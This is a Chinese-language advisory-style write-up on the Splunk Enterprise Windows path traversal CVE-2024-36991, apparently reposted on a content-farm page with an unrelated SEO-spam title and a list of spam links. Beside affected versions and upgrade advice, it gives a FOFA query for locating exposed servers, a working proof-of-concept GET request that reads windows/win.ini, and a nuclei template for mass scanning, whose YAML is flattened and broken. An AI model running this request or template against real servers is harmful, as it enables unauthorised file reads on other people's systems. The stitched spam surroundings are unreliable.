当前位置: 首页 > news >正文

购物商城网站开发镇海阿里巴巴关键词优化

购物商城网站开发,镇海阿里巴巴关键词优化,网页升级中,烟台高端网站开发文章目录 前言漏洞描述影响版本漏洞复现POC批量检测-nuclei脚本 修复建议 前言 Splunk Enterprise 是一款强大的机器数据管理和分析平台,能够实时收集、索引、搜索、分析和可视化来自各种数据源的日志和数据,帮助企业提升运营效率、增强安全性和优化业务…

文章目录

    • 前言
    • 漏洞描述
    • 影响版本
    • 漏洞复现
      • POC
      • 批量检测-nuclei脚本
    • 修复建议

前言

Splunk Enterprise 是一款强大的机器数据管理和分析平台,能够实时收集、索引、搜索、分析和可视化来自各种数据源的日志和数据,帮助企业提升运营效率、增强安全性和优化业务决策。

漏洞名称Splunk Enterprise 任意文件读取漏洞
漏洞编号CVE-2024-36991
公开时间2024-07-01
威胁类型信息泄漏

漏洞描述

在特定版本的 Windows 版 Splunk Enterprise 中,未经身份认证的攻击者可以在 /modules/messaging/ 接口通过目录穿越的方式读取任意文件,造成用户信息的泄露。

影响版本

9.2 <= Splunk Enterprise < 9.2.2
9.1 <= Splunk Enterprise < 9.1.5
9.0 <= Splunk Enterprise < 9.0.10

漏洞复现

FOFA语法:

app="splunk-Enterprise"

POC

GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: x.x.x.x
Connection: keep-alive

在这里插入图片描述

批量检测-nuclei脚本

id: CVE-2024-36991info:name: Splunk Enterprise for Windows 任意文件读取漏洞author: whgojpdescription:  Splunk Enterprise 是一款强大的数据分析软件,它允许用户从各种来源收集、索引和搜索机器生成的数据。2024年7月,官方发布安全通告,披露 CVE-2024-36991 Splunk Enterprise Windows平台 modules/messaging 目录遍历漏洞。漏洞仅影响 Windows平台上的 Splunk Enterprise,官方已发布安全更新,建议升级至最新版本。reference:- https://advisory.splunk.com/SVD-2024-0711tags: cve,cve2024,splunk-Enterprisrequests:- method: GETpath:- "{{BaseURL}}/zh-CN/modules/messaging/{{Path}}"matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "NetSetup.log"part: bodycondition: or- type: wordwords:- "Windows"- "debug"part: bodycondition: orvariables:Path:- "C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini"

修复建议

目前官方已有可更新版本,建议受影响用户升级至最新版本:

Splunk Enterprise 9.2.2
Splunk Enterprise 9.1.5
Splunk Enterprise 9.0.10

官方地址:https://www.splunk.com/zh_cn/download.html

http://www.yayakq.cn/news/41997/

相关文章:

  • 三明网站建设上海网站空间服务器
  • 大型网站系统图厦门logo设计公司
  • 深圳建设银行宝安支行网站电商创业项目有哪些
  • 海口网站建设呢安徽网新科技有限公司官网
  • 使用aspx做电影网站清河做网站哪儿好
  • 上海兼职做网站站外推广营销方案
  • 公文写作 课程中心网站建设营销策略分析论文
  • 南京医院网站建设做网站宣传
  • 的建站公司宣传片拍摄脚本模板
  • wordpress 仿neoeaae沈阳网站优化推广方案
  • 网站建设吗简洁大气企业网站源码 后台
  • 南宁网站托管4徐汇区网站建设
  • iis7 网站无法显示该页面做广告推广哪家好
  • jsp做网站都可以做什么哪里有好网站设计
  • 企业网站设计方案建设银行网站下载中心在哪
  • 公司的网站建设公司网站建设网站建设制作设计seo优化珠海
  • 绿茵足球网站建设政务服务 网站 建设方案
  • 汕头市小程序定制公司啥叫优化
  • 苏州网站排名优化报价北海网站制作公司
  • 做面包网站wordpress 事件插件
  • 网站开发先找UI吗静态网站如何共用一个头部和尾部
  • 深圳专业建站公司有哪些建筑工程网上申请质量安全监督
  • 网上做代卖的网站网站建设平ppt
  • 网站推广途径和要点有哪些我做的静态网站怎么发布到网上
  • 商城网站设计价格dedecms购物网站模板下载
  • 龙岩网站制作设计物流网页设计
  • 网站做推广有用网站建设费用是多少钱
  • 二次元下午茶wordpressseo营销论文
  • 一学一做看视频网站网址导航是什么浏览器
  • 桂阳县网站建设公司哪家好免费的网站托管